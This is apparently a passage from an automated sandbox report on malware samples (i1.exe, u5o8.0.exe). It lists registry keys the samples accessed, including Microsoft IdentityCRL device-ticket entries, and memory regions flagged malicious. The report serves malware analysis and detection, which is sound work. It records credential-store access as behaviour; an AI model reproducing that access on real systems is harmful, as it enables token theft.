\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
ProgramId
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
FileId
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
LowerCaseLongPath
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
LongPathHash
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
Name
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
OriginalFileName
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
Publisher
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
Version
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
BinFileVersion
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
BinaryType
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
ProductName
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
ProductVersion
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
LinkDate
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
BinProductVersion
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
AppxPackageFullName
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
AppxPackageRelativeId
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
Size
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
Language
\REGISTRY\A\{c2a6d73b-55b4-8150-9fea-67c36b9f43b3}\Root\InventoryApplicationFile\i1.exe|64d9c48bab2b9d58
Usn
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
FileDirectory
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
ProgramId
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
FileId
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
LowerCaseLongPath
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
LongPathHash
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
Name
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
OriginalFileName
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
Publisher
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
Version
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
BinFileVersion
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
BinaryType
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
ProductName
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
ProductVersion
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
LinkDate
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
BinProductVersion
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
AppxPackageFullName
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
AppxPackageRelativeId
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
Size
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
Language
\REGISTRY\A\{f2ca1062-500f-34ca-613e-bb9ff4997c4a}\Root\InventoryApplicationFile\u5o8.0.exe|c9fff60b011917b3
Usn
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property
0018C00DCE815A29
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
DeviceTicket
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
DeviceId
There are 103 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
34F0000
direct allocation
page execute and read and write
 malicious
2EABF9FB000
unkown
page readonly
 malicious
56A3000
trusted library allocation
page read and write
 malicious
4B68000
trusted library allocation
page read and write
 malicious
400000
unkown
page execute and read and write
 malicious
3C0B000
heap
page read and write
 malicious
54F0000
direct allocation
page read and write
 malicious
2EAD1E03000
trusted library allocation
page read and write
 malicious
2EADA920000
trusted library section
page read and write
 malicious
2EABC7FB000
unkown
page readonly
 malicious
902000
unkown
page readonly
 malicious
1A71000
heap
page read and write
 malicious
5CC0000
direct allocation
page read and write
 malicious
2EADA740000
trusted library section
page read and write
 malicious
3520000
direct allocation
page read and write
 malicious
3E4A000
heap
page read and write
 malicious
2FD9000
trusted library allocation
page read and write
1A1D000
unkown
page readonly
411000
unkown
page readonly
38D7000
heap
page read and write
2D4E000
stack
page read and write
540B000
trusted library allocation
page read and write
2FE8000
heap
page read and write
2250C000
heap
page read and write
778000
unkown
page read and write
2EADEB01000
heap
page read and write
E20000
heap
page read and write
1878375E000
heap
page read and write
38E5000
heap
page read and write
624000
unkown
page execute and read and write
271C000
heap
page read and write
38EC000
heap
page read and write
25E4000
direct allocation
page read and write
7FF477481000
trusted library allocation
page execute read
38B2000
heap
page read and write
2EADEE04000
heap
page read and write
2AC0000
unkown
page read and write
2EADEAC2000
heap
page read and write
87E000
unkown
page readonly
22505000
heap
page read and write
79D0000
trusted library allocation
page read and write
2EADEFCE000
heap
page read and write
3912000
heap
page read and write
224F0000
heap
page read and write
2784000
unkown
page read and write
1285000
heap
page read and write
1878845A000
heap
page read and write
38BC000
heap
page read and write
549E000
stack
page read and write
2628000
direct allocation
page read and write
38CD000
heap
page read and write
3821000
heap
page read and write
7FFD99B96000
trusted library allocation
page read and write
22500000
heap
page read and write
18783891000
trusted library allocation
page read and write
BC0000
direct allocation
page execute and read and write
2784000
unkown
page read and write
33C0000
heap
page read and write
2F9BE000
heap
page read and write
2EAC0219000
heap
page read and write
4E50000
heap
page read and write
FD915FB000
stack
page read and write
2F923000
heap
page read and write
38C2000
heap
page read and write
5985000
trusted library allocation
page read and write
1A50000
heap
page read and write
4ACD000
stack
page read and write
4A0000
heap
page read and write
E78000
heap
page read and write
1B7E000
stack
page read and write
2C2F000
stack
page read and write
2EABC7C0000
unkown
page readonly
30546FE000
unkown
page readonly
A94000
heap
page read and write
2F19000
trusted library allocation
page read and write
33C4000
unkown
page read and write
2EAC0170000
heap
page read and write
5989000
trusted library allocation
page read and write
7255000
heap
page read and write
5C0000
heap
page read and write
2EABEFFB000
unkown
page readonly
6BAD000
stack
page read and write
FC0000
heap
page read and write
2784000
unkown
page read and write
6C3B7000
unkown
page readonly
53CE000
stack
page read and write
2F2A000
trusted library allocation
page read and write
D4C000
unkown
page readonly
187884C8000
heap
page read and write
2F725000
heap
page read and write
7FFD99AC5000
trusted library allocation
page read and write
6C3FD000
unkown
page read and write
2755000
trusted library allocation
page read and write
3BB5000
heap
page read and write
2612000
direct allocation
page read and write
3868000
heap
page read and write
1C0A000
heap
page execute and read and write
3053C7F000
stack
page read and write
18788263000
trusted library allocation
page read and write
187883AC000
trusted library allocation
page read and write
6C794000
unkown
page read and write
2F7D4000
heap
page read and write
66A0000
trusted library allocation
page read and write
CA8000
heap
page read and write
2EAC1BA0000
trusted library allocation
page read and write
7FFD999F0000
trusted library allocation
page read and write
5E6000
heap
page read and write
7550000
trusted library allocation
page read and write
3015000
trusted library allocation
page read and write
1010000
trusted library allocation
page read and write
5051000
unkown
page read and write
38F0000
heap
page read and write
D40000
heap
page read and write
636000
unkown
page execute and read and write
2784000
unkown
page read and write
C38000
heap
page read and write
2EC3000
trusted library allocation
page read and write
268D000
direct allocation
page read and write
33B0000
direct allocation
page read and write
5C0000
heap
page read and write
7FF477472000
trusted library allocation
page readonly
18782CF0000
heap
page read and write
2741000
trusted library allocation
page read and write
1DEF000
stack
page read and write
100D000
trusted library allocation
page execute and read and write
1C030000
heap
page read and write
FD9227E000
stack
page read and write
4F5E000
trusted library allocation
page read and write
3912000
heap
page read and write
3720000
heap
page read and write
38B2000
heap
page read and write
4CA0000
direct allocation
page read and write
7FFD99D60000
trusted library allocation
page execute and read and write
A94000
heap
page read and write
2EAC2095000
trusted library allocation
page read and write
2F775000
heap
page read and write
63CE000
stack
page read and write
A10000
heap
page read and write
38BE000
heap
page read and write
18788454000
heap
page read and write
C7E000
heap
page read and write
408000
unkown
page readonly
23B0000
unkown
page readonly
91D000
heap
page read and write
316F000
trusted library allocation
page read and write
588000
heap
page read and write
2F6F8000
heap
page read and write
7FF477484000
trusted library allocation
page readonly
7FFD99B08000
trusted library allocation
page read and write
275C000
stack
page read and write
411E000
trusted library allocation
page read and write
18783702000
heap
page read and write
34BF000
stack
page read and write
187882F4000
trusted library allocation
page read and write
3718000
heap
page read and write
4BCF000
stack
page read and write
7FFD99A20000
trusted library allocation
page read and write
18782E22000
heap
page read and write
42F000
unkown
page read and write
38B8000
heap
page read and write
7D8D000
stack
page read and write
7FFD99840000
trusted library allocation
page read and write
BA0000
unkown
page readonly
2EAE1530000
trusted library section
page read and write
3912000
heap
page read and write
2B50000
unkown
page read and write
321F000
stack
page read and write
6360000
trusted library allocation
page read and write
7F610000
trusted library allocation
page execute and read and write
2EADEA2B000
heap
page read and write
2EAD1D5C000
trusted library allocation
page read and write
A90000
heap
page read and write
5E7000
heap
page read and write
F90000
heap
page read and write
1C7000
heap
page read and write
38EF000
heap
page read and write
38E6000
heap
page read and write
2EAE1510000
trusted library section
page read and write
4B71000
trusted library allocation
page read and write
2EAE1500000
trusted library section
page read and write
38EA000
heap
page read and write
18782EA1000
heap
page read and write
4D98000
trusted library allocation
page read and write
FD9287E000
stack
page read and write
7F4000
heap
page read and write
2F7A7000
heap
page read and write
2250D000
heap
page read and write
187882BD000
trusted library allocation
page read and write
6CED000
heap
page read and write
702E000
stack
page read and write
18782E13000
heap
page read and write
187882BF000
trusted library allocation
page read and write
5E3000
heap
page read and write
6CEB000
heap
page read and write
3054FFE000
unkown
page readonly
FD91F7B000
stack
page read and write
2EAC01EB000
heap
page read and write
450D000
stack
page read and write
2F0D0000
heap
page read and write
2F793000
heap
page read and write
2798000
stack
page read and write
41CD000
trusted library allocation
page read and write
4520000
heap
page read and write
B9F000
stack
page read and write
3D4F000
heap
page read and write
2EAC20B6000
trusted library allocation
page read and write
2780000
heap
page read and write
33BE000
stack
page read and write
10AE000
stack
page read and write
2EAD1D41000
trusted library allocation
page read and write
2640000
trusted library allocation
page read and write
2250C000
heap
page read and write
25F4000
direct allocation
page read and write
1C0000
heap
page read and write
57D0000
direct allocation
page read and write
3E6E000
stack
page read and write
2229E000
heap
page read and write
38E3000
heap
page read and write
B73000
heap
page read and write
2EAC01B8000
heap
page read and write
187882BA000
trusted library allocation
page read and write
2F9C3000
heap
page read and write
2F9EB000
heap
page read and write
38CC000
heap
page read and write
519000
stack
page read and write
18782E59000
heap
page read and write
821D000
stack
page read and write
2F68F000
heap
page read and write
7FFD99B00000
trusted library allocation
page read and write
2EADEF86000
heap
page read and write
1010000
heap
page read and write
38E7000
heap
page read and write
3830000
heap
page read and write
5051000
unkown
page read and write
30E2000
trusted library allocation
page read and write
18782DD0000
heap
page read and write
2EADEB20000
trusted library allocation
page read and write
2334000
heap
page read and write
2EADA640000
heap
page execute and read and write
4FE000
stack
page read and write
5051000
unkown
page read and write
3899000
heap
page read and write
2FA18000
heap
page read and write
2250C000
heap
page read and write
400000
unkown
page execute and read and write
1878370C000
heap
page read and write
3760000
heap
page read and write
2F7C5000
heap
page read and write
7FFD999F2000
trusted library allocation
page read and write
1B3B000
heap
page read and write
25D4000
direct allocation
page read and write
2EADE960000
heap
page read and write
2EE9000
trusted library allocation
page read and write
3734000
unkown
page read and write
224E6000
heap
page read and write
5BDB000
trusted library allocation
page read and write
321B000
heap
page read and write
38CC000
heap
page read and write
AEF000
stack
page read and write
2F630000
heap
page read and write
7FFD99A4D000
trusted library allocation
page read and write
3210000
heap
page read and write
19A000
stack
page read and write
A4A000
heap
page read and write
2CC0000
heap
page read and write
D4C000
unkown
page readonly
2F7D9000
heap
page read and write
2EAE09F0000
trusted library allocation
page read and write
224E4000
heap
page read and write
52A0000
trusted library allocation
page read and write
2EAD9D40000
trusted library allocation
page read and write
44EB000
unkown
page read and write
E98000
heap
page read and write
38F0000
heap
page read and write
9B000
stack
page read and write
2645000
direct allocation
page read and write
766000
unkown
page read and write
6430000
trusted library allocation
page execute and read and write
2900000
heap
page read and write
2EAC000
stack
page read and write
3A51000
heap
page read and write
38EA000
heap
page read and write
369F000
unkown
page read and write
11BF000
stack
page read and write
38C5000
heap
page read and write
C84000
heap
page read and write
2B3E000
unkown
page read and write
2EDE000
trusted library allocation
page read and write
2780000
heap
page read and write
2CB0000
trusted library allocation
page read and write
1878848D000
heap
page read and write
38CE000
heap
page read and write
2AEE000
stack
page read and write
22188000
heap
page read and write
650000
heap
page read and write
7216000
heap
page read and write
61E00000
direct allocation
page execute and read and write
18788541000
heap
page read and write
2C84000
trusted library allocation
page read and write
2778000
trusted library allocation
page read and write
3A75000
heap
page read and write
3079000
trusted library allocation
page read and write
1BEE000
stack
page read and write
2EADAB70000
trusted library section
page read and write
26F0000
trusted library allocation
page read and write
2FC0000
trusted library allocation
page read and write
30545FC000
stack
page read and write
2F9FA000
heap
page read and write
7FFD99BE0000
trusted library allocation
page read and write
2FFB000
heap
page read and write
C14000
heap
page read and write
5F8000
heap
page read and write
2EABDBFB000
unkown
page readonly
C12000
heap
page read and write
614000
heap
page read and write
224E3000
heap
page read and write
2BBB000
trusted library allocation
page read and write
31FC000
trusted library allocation
page read and write
411000
unkown
page readonly
224F0000
heap
page read and write
7FFD99B5B000
trusted library allocation
page read and write
18788260000
trusted library allocation
page read and write
3710000
unkown
page read and write
C38000
heap
page read and write
1003000
trusted library allocation
page execute and read and write
2EAC20EC000
trusted library allocation
page read and write
2C2F000
stack
page read and write
38D2000
heap
page read and write
73B000
stack
page read and write
2784000
unkown
page read and write
53E0000
trusted library allocation
page read and write
38BC000
heap
page read and write
38B1000
heap
page read and write
3EAC000
stack
page read and write
38DA000
heap
page read and write
4B1F000
trusted library allocation
page read and write
1A4E000
heap
page read and write
2678000
direct allocation
page read and write
38B7000
heap
page read and write
187883D0000
trusted library allocation
page read and write
388C000
heap
page read and write
11BF000
heap
page read and write
7FFD99AC2000
trusted library allocation
page read and write
224E3000
heap
page read and write
BA1000
unkown
page execute read
18782E73000
heap
page read and write
5E3000
heap
page read and write
2EADA587000
heap
page read and write
2784000
unkown
page read and write
D34000
trusted library allocation
page read and write
2784000
unkown
page read and write
2950000
unkown
page read and write
2D71000
trusted library allocation
page read and write
7FFD99864000
trusted library allocation
page read and write
C52000
heap
page read and write
30543FC000
stack
page read and write
2D40000
trusted library allocation
page read and write
6D3E000
stack
page read and write
2F72A000
heap
page read and write
52C0000
trusted library allocation
page read and write
38CD000
heap
page read and write
78BD000
stack
page read and write
2760000
trusted library allocation
page read and write
38D4000
heap
page read and write
F70000
heap
page read and write
6C7D000
stack
page read and write
38D4000
heap
page read and write
115E000
heap
page read and write
B2E000
stack
page read and write
7268000
heap
page read and write
770000
heap
page read and write
230000
unkown
page readonly
3864000
heap
page read and write
6B3AD000
unkown
page readonly
386E000
heap
page read and write
400000
unkown
page readonly
3852000
heap
page read and write
7530000
trusted library allocation
page read and write
3840000
heap
page read and write
2F685000
heap
page read and write
2EAC028D000
heap
page read and write
2F919000
heap
page read and write
18783E90000
trusted library section
page readonly
2EADEE43000
heap
page read and write
38F1000
heap
page read and write
307C000
trusted library allocation
page read and write
224FE000
heap
page read and write
187883A1000
trusted library allocation
page read and write
2B80000
heap
page read and write
22188000
heap
page read and write
18782E43000
heap
page read and write
33C4000
unkown
page read and write
2EADE91B000
heap
page read and write
4A8E000
stack
page read and write
5050000
unkown
page read and write
7FFD99AE0000
trusted library allocation
page execute and read and write
18782E8F000
heap
page read and write
6F80000
trusted library allocation
page execute and read and write
1BFA000
heap
page read and write
2F7CA000
heap
page read and write
84F000
stack
page read and write
640E000
stack
page read and write
49A0000
trusted library allocation
page read and write
5D0000
heap
page read and write
2EAC0535000
heap
page read and write
2EAC1B70000
trusted library allocation
page read and write
49A0000
heap
page read and write
497F000
stack
page read and write
62E0000
trusted library allocation
page read and write
2CE0000
heap
page read and write
2EAC1BD3000
heap
page read and write
2EADEE3F000
heap
page read and write
770D000
stack
page read and write
3912000
heap
page read and write
74D0000
trusted library allocation
page execute and read and write
7FFD99D00000
trusted library allocation
page read and write
3912000
heap
page read and write
2694000
direct allocation
page read and write
7229000
stack
page read and write
2EADEE78000
heap
page read and write
BB0000
heap
page read and write
7FFD99BC8000
trusted library allocation
page read and write
38D9000
heap
page read and write
22504000
heap
page read and write
25A3000
direct allocation
page read and write
2FE5000
heap
page read and write
31F4000
trusted library allocation
page read and write
7FA0000
trusted library allocation
page read and write
2F77F000
heap
page read and write
5982000
trusted library allocation
page read and write
2EADEA08000
heap
page read and write
18784201000
trusted library allocation
page read and write
419000
unkown
page write copy
5E3000
heap
page read and write
401E000
stack
page read and write
1B30000
heap
page read and write
3A50000
heap
page read and write
38B8000
heap
page read and write
BA0000
unkown
page readonly
2F716000
heap
page read and write
D38000
stack
page read and write
18788314000
trusted library allocation
page read and write
FD91AFD000
stack
page read and write
97000
stack
page read and write
F95000
heap
page read and write
1B3B000
heap
page read and write
3E72000
heap
page read and write
3590000
direct allocation
page execute and read and write
2EAC1D10000
trusted library section
page read and write
187882E0000
trusted library allocation
page read and write
EC8000
heap
page read and write
2EADA7B0000
trusted library section
page read and write
314E000
trusted library allocation
page read and write
BE8000
heap
page read and write
38D5000
heap
page read and write
1B20000
heap
page read and write
2784000
unkown
page read and write
368F000
stack
page read and write
2F6A3000
heap
page read and write
38D2000
heap
page read and write
D33000
trusted library allocation
page execute and read and write
2EADA600000
heap
page read and write
FD919FD000
stack
page read and write
1AF7000
heap
page read and write
6C78D000
unkown
page read and write
2EE3000
trusted library allocation
page read and write
74AE000
stack
page read and write
381F000
stack
page read and write
1BA9F000
stack
page read and write
4AD0000
heap
page execute and read and write
2F67B000
heap
page read and write
400000
unkown
page readonly
2EAD210F000
trusted library allocation
page read and write
A3C000
heap
page read and write
3926000
heap
page read and write
747E000
stack
page read and write
325E000
stack
page read and write
2EADE98B000
heap
page read and write
DC3000
unkown
page readonly
33C4000
unkown
page read and write
7222000
heap
page read and write
720F000
heap
page read and write
224F0000
heap
page read and write
1D4F000
stack
page read and write
7FFD99A50000
trusted library allocation
page read and write
2EAC1F79000
trusted library allocation
page read and write
2FA9F000
heap
page read and write
2FA0E000
heap
page read and write
38C5000
trusted library allocation
page read and write
2250A000
heap
page read and write
38CE000
heap
page read and write
B40000
heap
page read and write
72D1000
heap
page read and write
22500000
heap
page read and write
38BA000
heap
page read and write
2F78E000
heap
page read and write
3DF4000
heap
page read and write
3820000
heap
page read and write
187884F2000
heap
page read and write
C48000
heap
page read and write
2EADEE5E000
heap
page read and write
2F6E4000
heap
page read and write
22188000
heap
page read and write
5B99000
trusted library allocation
page read and write
2EAC0070000
unkown
page readonly
1878831F000
trusted library allocation
page read and write
224ED000
heap
page read and write
7F4000
heap
page read and write
18782F02000
heap
page read and write
7F4000
heap
page read and write
38CE000
heap
page read and write
187884EC000
heap
page read and write
1A5B000
heap
page execute and read and write
541C000
heap
page read and write
29AA000
unkown
page read and write
736D000
stack
page read and write
61ED0000
direct allocation
page read and write
3710000
heap
page read and write
DC3000
unkown
page readonly
1B3B000
heap
page read and write
2784000
unkown
page read and write
565A000
trusted library allocation
page read and write
45A2000
unkown
page read and write
2BD0000
trusted library allocation
page read and write
2F2F000
trusted library allocation
page read and write
53E4000
trusted library allocation
page read and write
2F5E4000
heap
page read and write
8260000
heap
page read and write
9CE000
stack
page read and write
7FFD99C50000
trusted library allocation
page read and write
224EA000
heap
page read and write
2FFF000
heap
page read and write
1878851B000
heap
page read and write
2F7B000
trusted library allocation
page read and write
6F60000
trusted library allocation
page read and write
71EF000
heap
page read and write
B80000
heap
page read and write
371B000
heap
page read and write
38D1000
heap
page read and write
2F6EE000
heap
page read and write
3E6D000
trusted library allocation
page read and write
7FFD99D10000
trusted library allocation
page read and write
267F000
direct allocation
page read and write
29B6000
unkown
page read and write
38B7000
heap
page read and write
2250C000
heap
page read and write
19F7000
unkown
page read and write
6C747000
unkown
page readonly
6F1D000
stack
page read and write
2FF4000
heap
page read and write
5051000
unkown
page read and write
7F4000
heap
page read and write
2F694000
heap
page read and write
7FFD99C70000
trusted library allocation
page execute and read and write
7730000
trusted library allocation
page execute and read and write
4E3E000
direct allocation
page read and write
114F000
heap
page read and write
2F9F5000
heap
page read and write
2E45000
trusted library allocation
page read and write
2EADADA0000
trusted library section
page read and write
2784000
unkown
page read and write
2DD0000
heap
page read and write
19B000
stack
page read and write
2EADA60E000
heap
page read and write
30555FE000
stack
page read and write
62D0000
trusted library allocation
page read and write
2C30000
heap
page read and write
18788290000
trusted library allocation
page read and write
2F68000
trusted library allocation
page read and write
44B000
unkown
page execute and read and write
2EADA832000
heap
page read and write
2EABE5FB000
unkown
page readonly
525B000
trusted library allocation
page read and write
2EADA510000
heap
page read and write
6BEF000
stack
page read and write
2BAE000
stack
page read and write
2F702000
heap
page read and write
30558FE000
unkown
page readonly
FD911FA000
stack
page read and write
25B6000
direct allocation
page read and write
2EAC0190000
heap
page read and write
4990000
heap
page read and write
BA1000
unkown
page execute read
1030000
heap
page read and write
2EADA810000
heap
page read and write
187882C5000
trusted library allocation
page read and write
667E000
stack
page read and write
2850000
heap
page read and write
2F761000
heap
page read and write
7FFD99A0B000
trusted library allocation
page read and write
53D0000
trusted library allocation
page execute and read and write
62BC000
stack
page read and write
526A000
trusted library allocation
page read and write
38D7000
heap
page read and write
6D42000
heap
page read and write
61EB4000
direct allocation
page read and write
7FFD99960000
trusted library allocation
page execute and read and write
7FFD998F6000
trusted library allocation
page read and write
22180000
heap
page read and write
187883E0000
trusted library allocation
page read and write
7BE000
stack
page read and write
7A40000
trusted library allocation
page read and write
224EE000
heap
page read and write
3F10000
heap
page read and write
38CD000
heap
page read and write
CA6000
heap
page read and write
8060000
trusted library allocation
page execute and read and write
2F748000
heap
page read and write
2CB2000
trusted library allocation
page read and write
639000
stack
page read and write
224EC000
heap
page read and write
7FFD99B10000
trusted library allocation
page read and write
101D000
trusted library allocation
page execute and read and write
2EADEE4C000
heap
page read and write
2EADE982000
heap
page read and write
2710000
heap
page execute and read and write
F8E000
heap
page read and write
EC0000
heap
page read and write
2EAC1B90000
trusted library allocation
page read and write
2F699000
heap
page read and write
2EAC01B0000
heap
page read and write
